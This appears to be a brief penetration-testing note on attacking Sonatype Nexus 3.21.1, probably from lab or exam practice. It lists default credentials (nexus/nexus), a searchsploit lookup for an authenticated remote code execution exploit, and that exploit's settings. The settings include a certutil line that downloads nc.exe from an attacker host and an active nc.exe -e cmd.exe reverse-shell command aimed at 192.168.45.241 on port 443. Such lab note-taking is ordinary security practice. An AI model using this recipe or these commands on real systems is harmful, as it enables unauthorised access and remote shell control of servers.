Sonatype Nexus
Default Credentials
Authenticated RCE
$ searchsploit nexus 3.21
Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated) | java/webapps/49385.pyURL='http://192.168.156.61:8081'
#CMD='certutil.exe -urlcache -split -f http://192.168.45.241/nc.exe nc.exe'
CMD='nc.exe -e cmd.exe 192.168.45.241 443'
USERNAME='nexus'
PASSWORD='nexus'Last updated